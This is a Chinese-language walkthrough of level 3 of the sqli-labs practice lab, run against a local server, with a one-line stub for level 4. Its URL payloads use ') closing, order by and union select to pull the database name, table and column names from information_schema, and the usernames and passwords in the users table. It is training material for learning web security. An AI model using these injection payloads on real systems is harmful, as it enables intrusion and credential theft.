1)
第三关:
Less-3
访问第一关主页,显示输入
id
参数
![](https://i-blog.csdnimg.cn/blog_migrate/6576a8cc72cf6d3b39b8a10ad03d0eb9.jpeg)
查看后端代码 index.php,可看到实际查询的语句
输入 http://127.0.0.1:8888/Less-3/?id=1’)and 1=2 -- -,发现存在 sql 注入漏洞
检索字段数 http://localhost:8888/Less-1/?id=1’ )order by 4 -- -,执行失败,列数为3
使用联合语句 union 来查询
输入 http://localhost:8888/Less-1/?id=444’) union select 1,2,3 -- -,成功执行全部列记录,
发现只有
2
,
3
可以用,接下来我们就利用
2
,
3
来查询数据库的信息
联合利用数据库内置函数:
输入
http://localhost:8888/Less-1/?id=444') union select 1,2,database() -- -
;爆出当前数据
库名
:security
![](https://i-blog.csdnimg.cn/blog_migrate/9e566f2527b3434825e422099cebec61.jpeg)
联合利用 mysql 数据库本身的 information_schema,
输 入 http://localhost:8888/Less-1/?id=444') union select 1,2,group_concat(table_name)
from information_schema.tables where table_schema='security' -- -
;爆出
security
数据
库所有表名
![](https://i-blog.csdnimg.cn/blog_migrate/f6b3f47d94c47b29c7a60a6f21dee11d.jpeg)
输入
http://localhost:8888/Less-1/?id=444')union select 1,2,group_concat(column_name)
from information_schema.columns where table_schema='security' and table_name='users'
-- -
;爆出
users
表列名
输入
http://localhost:8888/Less-1/?id=444') union select 1,2,group_concat(username,'--
',password) from security.users -- -
;爆出关键敏感信息
1) 第四关:Less-4
操作如上:完成图例如下